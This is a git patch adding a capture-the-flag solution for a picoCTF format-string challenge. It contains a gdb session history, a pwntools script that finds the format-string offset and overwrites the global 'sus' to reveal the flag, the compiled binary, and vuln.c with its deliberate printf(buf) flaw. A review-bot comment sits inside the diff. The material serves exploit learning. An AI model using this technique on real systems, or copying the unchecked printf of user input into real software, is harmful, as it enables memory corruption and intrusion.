From b4bd094d7e266097471a81fa92f9ab47b107e10c Mon Sep 17 00:00:00 2001 From: Maxime Vorwerk Date: Sat, 2 Nov 2024 02:00:29 +0100 Subject: [PATCH] format string 2 --- format_string_2/.gdb_history | 217 ++++++++++++++++++++++++++ format_string_2/peda-session-vuln.txt | 2 + format_string_2/sol.py | 24 +++ format_string_2/vuln | Bin 0 -> 16272 bytes format_string_2/vuln.c | 35 +++++ 5 files changed, 278 insertions(+) create mode 100644 format_string_2/.gdb_history create mode 100644 format_string_2/peda-session-vuln.txt create mode 100755 format_string_2/sol.py create mode 100755 format_string_2/vuln create mode 100644 format_string_2/vuln.c diff --git a/format_string_2/.gdb_history b/format_string_2/.gdb_history new file mode 100644 index 0000000..28b50a2 --- /dev/null +++ b/format_string_2/.gdb_history 
@@ -0,0 +1,217 @@ +disassemble main +b *main+75 +run +exit +disams main +disasm +disams main +disasm main +disassemble main +b *main+75 +run +n +n +n +n +stack +stack 10 +stack 20 +stack 40 +search 0x21737573 +search \x21\x73\x75\x73 +search -dword 0x21737573 +search --dword 0x21737573 +search --dword 0x00404060 +search --qword 0x0000000000404060 +disassemble main +stack 40 +stack 60 +search --dword 0x21737573 +run +continue +run +stack 40 +stack 60 +continue +run +search --dword 0x21737573 +continue +run +continue +run +disassemble main +exit +disassemble main +exit +disassemble main +b *main+95 +run +stack 60 +help x +stack 60 +x 1xg 0x7fffffffbc70 +x 1x 0x7fffffffbc70 +x 0x7fffffffbc70 +x 0x7fffffffbc70 +2x 0x7fffffffbc70 +x2 0x7fffffffbc70 +x 2 0x7fffffffbc70 +x /2 0x7fffffffbc70 +x /1xg 0x7fffffffbc70 +n +x /1xg 0x7fffffffbc70A +continue +continue +run +exit +b *main+95 +run +x /1xg 0x7fffffffbc70A +stack +stack 60 +x /1xg 0x7fffffffbc70 +continue +run +stack +stack 60 +x /1xg 0x7fffffffbc70 +continue +run +stack 60 +continue +exit +python import sys +python print(sys.path) +exit +exit +exit +exit +exit +exit +exit +exit +exit +exit +disassemble main +b *main+95 +run +stack 40 +continue +disassemble main +run +stack 40 +continue +search b570 +find b570 +run +stack 40 +continue +info +exit +disassemble main +b *main+95 +run +stack 40 +continue +run +stack 40 +continue +run +n +stack 40 +exit +disassemble main +b *main+95 +run +n +x/1x +x/2xw 0x7fffffffb570 +x/xw 0x7fffffffb570 +x 0x7fffffffb570 +continue +run +x 0x7fffffffb570 +n +x 0x7fffffffb570 +continue +run +stack 60 +continue +run +stack 60 +n +continue +run +stack 20 +continue +run +stack +stack20 +stack 20 +continue +run +stack 20 +continue +run +exit +b *main+95 +run < python print(b"\x60\x40\x40\x00") +run < python -c "print(b"\x60\x40\x40\x00")" +run < python3 -c "print(b"\x60\x40\x40\x00")" +exit +b *main+95 +run < pipe +exit +b *main+95 +run < pipe +continue +exit +b *main+95 +run < pipe +stack 20 
+x 0x404060
+n
+x 0x404060
+exit
+b *main+95
+run
+stack 20
+n
+exit
+exit
+b *main+95
+run
+run < pipe
+x 0x404060
+n
+x 0x404060
+stack 20
+continue
+exit
+b *main+95
+run
+run < pipe
+disassemble main
+x 0x404060
+x 0x7fffffffba00
+x $rip
+x $rip+0x2de7
+x 0x401273+0x2de7
+x 0x401279+0x2de7
+stack 40
+continue
+run
+stack 40
+n
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+continue
+run < pipe
+stack 20
+exit
diff --git a/format_string_2/peda-session-vuln.txt b/format_string_2/peda-session-vuln.txt
new file mode 100644
index 0000000..fe91fea
--- /dev/null
+++ b/format_string_2/peda-session-vuln.txt
@@ -0,0 +1,2 @@
+break *main+95
+
diff --git a/format_string_2/sol.py b/format_string_2/sol.py
new file mode 100755
index 0000000..60eb32f
--- /dev/null
+++ b/format_string_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.arch = "amd64"
+
+address = "rhea.picoctf.net"
+port = 51393
+conn = remote(address, port)
+
+def send_payload(payload):
+ conn = remote(address, port)
+ log.info(f"payload: {repr(payload)}")
+ conn.sendline(payload)
+ return conn.recvall()
+
+format_string = FmtStr(send_payload)
+offset = format_string.offset
+
+payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
+log.info(payload)
+conn.sendline(payload)
+
+flag = conn.recvall()
+log.success(flag)
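Review bot: Every probe connection that `send_payload` opens for `FmtStr` is never closed, and its local `conn` shadows the module-level `conn` that carries the final payload, so the two are easy to confuse; use a context manager with a distinct name, `with remote(address, port) as probe:` / `probe.sendline(payload)` / `return probe.recvall()`. The module-level connection is also opened at the top of the script, before the offset search has run, so it sits idle through every probe round trip; moving `conn = remote(address, port)` to just before the final `conn.sendline(payload)` removes any exposure to a server-side idle timeout (inferred, not visible here). The write target `0x404060` is a bare magic number; it appears to be the address of the non-PIE `sus` global that the accompanying gdb session inspects, and a comment such as `# &sus in the non-PIE vuln binary (see .gdb_history)` would record where it came from. With `scanf("%1024s", ...)` on the receiving side the payload must stay free of whitespace bytes and under 1024 bytes, which is worth stating in a comment next to the `fmtstr_payload` call since `fmtstr_payload` does not enforce either.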
diff --git a/format_string_2/vuln b/format_string_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..c73077a23f4cc42f76c53d29461c6185966643ed GIT binary patch literal 16272 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 + +int sus = 0x21737573; + +int main() { + char buf[1024]; + char flag[64]; + + + printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n"); + fflush(stdout); + scanf("%1024s", buf); + printf("Here's your input: "); + printf(buf); + printf("\n"); + fflush(stdout); + + if (sus == 0x67616c66) { + printf("I have NO clue how you did that, you must be a wizard. Here you go...\n"); + + // Read in the flag + FILE *fd = fopen("flag.txt", "r"); + fgets(flag, 64, fd); + + printf("%s", flag); + fflush(stdout); + } + else { + printf("sus = 0x%x\n", sus); + printf("You can do better!\n"); + fflush(stdout); + } + + return 0; +}